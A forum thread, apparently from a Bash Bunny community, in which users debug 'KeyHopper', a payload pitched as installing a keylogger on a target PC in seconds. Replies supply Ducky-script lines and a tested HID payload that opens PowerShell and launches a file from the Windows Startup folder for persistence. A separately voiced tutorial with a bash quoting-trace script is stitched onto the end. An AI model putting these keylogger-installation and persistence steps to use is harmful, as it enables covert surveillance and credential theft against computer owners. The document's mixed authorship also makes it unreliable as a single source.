C1PH3R
Posted February 11, 2018

Link to GitHub: https://github.com/CIPH3R0/bashbunny-payloads/tree/master/payloads/library/KeyHopper

The way to have a keylogger installed in seconds! Tell me what you think!

C1PH3R
"Don't look at the branch of the problem, look at the root (C1PH3R)"
GermanNoob
Posted February 12, 2018

Hi @C1PH3R, I had a look at your payload and, as you asked, here are some minor remarks / suggestions:

Line 29-31: Since Darren's WAIT, I prefer that at this moment of the payload. It speeds things up if you don't know the performance of your target in advance...

Line 32-35: Not sure why UAC should be triggered at this moment. Seems to me that you entered a command before that you have deleted?

Line 43-46: Why don't you use "RUN WIN POWERSHELL" here, as you did before on line 37?

Line 52 & 55: Instead of forcing the user to make changes within the payload, I suggest using a variable for "service host.txt" in the config part.

Best regards!
C1PH3R (Author)
Posted February 13, 2018

On 2/12/2018 at 8:46 AM, GermanNoob said:

    Hi @C1PH3R, I had a look at your payload and, as you asked, here are some minor remarks / suggestions:
    Line 29-31: Since Darren's WAIT, I prefer that at this moment of the payload. It speeds things up if you don't know the performance of your target in advance...
    Line 32-35: Not sure why UAC should be triggered at this moment. Seems to me that you entered a command before that you have deleted?
    Line 43-46: Why don't you use "RUN WIN POWERSHELL" here, as you did before on line 37?
    Line 52 & 55: Instead of forcing the user to make changes within the payload, I suggest using a variable for "service host.txt" in the config part.
    Best regards!

* Line 29-31: If you want, you can add that yourself, but when/if I am pentesting I would rather not have to change the switch position.
* Line 32-35: Yeah, that was a previous command that I removed (it is edited now).
* Line 43-46: Because I am using a CNTRL v command that prevents me from doing that (CNTRL v pastes the drive letter of the bunny).
* Line 52 & 55: I was trying that, but I could not get a variable to work with a string instead of numbers. Suggestions would be great!
GermanNoob
Posted February 13, 2018

3 hours ago, C1PH3R said:

    * Line 52 & 55: I was trying that, but I could not get a variable to work with a string instead of numbers. Suggestions would be great!

Well, this should work:

    Q STRING 'payloads\'$variable "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
    Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'"
C1PH3R (Author)
Posted February 13, 2018

Yeah, I have tried that, but it does not type the variable out. That's the problem.
GermanNoob
Posted February 13, 2018

Well, I tested them in a Windows VM and this short test payload works fine with both lines:

    LED SETUP
    variable=TEST
    LED ATTACK
    ATTACKMODE HID
    WAIT
    RUN WIN powershell
    sleep 1
    Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'"
    LED FINISH
C1PH3R (Author)
Posted February 15, 2018

On 2/13/2018 at 9:17 PM, GermanNoob said:

    Well, I tested them in a Windows VM and this short test payload works fine with both lines:

    LED SETUP
    variable=TEST
    LED ATTACK
    ATTACKMODE HID
    WAIT
    RUN WIN powershell
    sleep 1
    Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'"
    LED FINISH

Ahh, I see my problem (at least I think). I used:

    variable="TEST"

I've made some edits, so it should all be fine now!
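The quoting GermanNoob posted (and that both replies above are about) is ordinary bash quoting: a Bash Bunny payload is a bash script, so what Q STRING receives is whatever bash produces after quote removal and variable expansion. The script below is an added example, not code from the thread or from the KeyHopper project, and needs no Bash Bunny to run. `render` is a stand-in for Q STRING that just joins its arguments the way the typed line would look, and `line_one`, `line_two` and `same_value` are helper names chosen here; the value `TEST` is the one used in the thread. It also shows that, in bash, `variable=TEST` and `variable="TEST"` assign the same value, so a reader can check exactly which characters each form of the line would type before trusting a payload with it.

```shell
#!/bin/sh
# Added example (not from the thread): trace what bash hands to Q STRING for the
# two lines GermanNoob suggested. render() stands in for Q STRING and simply
# joins its arguments with single spaces, which is how the typed text appears.
render() {
    printf '%s' "$*"
}

# Suggested line 1: a single-quoted literal 'payloads\' immediately followed by a
# bare $variable forms ONE word; the second argument is a double-quoted string
# that carries its own single quotes through to the typed text.
line_one() {
    variable="$1"
    render 'payloads\'$variable "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
}

# Suggested line 2: the double quote just before $variable CLOSES the string,
# $variable is expanded unquoted, and "\'" reopens a short quoted piece. Inside
# double quotes bash collapses only \\ to \ (and escapes $ ` " and newline);
# sequences such as \R, \M and \' are left exactly as written. Because there is
# no whitespace between the three pieces, they still form one argument.
line_two() {
    variable="$1"
    render "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$variable"\'"
}

# The two assignment forms mentioned in the thread yield identical values in
# bash: quotes around a plain word are removed by quote removal, not stored.
same_value() {
    a=TEST
    b="TEST"
    if [ "$a" = "$b" ]; then echo yes; else echo no; fi
}

main() {
    printf 'line 1 types: %s\n' "$(line_one TEST)"
    printf 'line 2 types: %s\n' "$(line_two TEST)"
    printf 'variable=TEST equals variable="TEST": %s\n' "$(same_value)"
}
main
```

Running it prints the exact text each Q STRING line would type, which makes it easy to spot where a stray quote or backslash ends up; `line_two` in particular produces a path whose closing single quote is preceded by a literal backslash, because the final `"\'"` keeps its backslash.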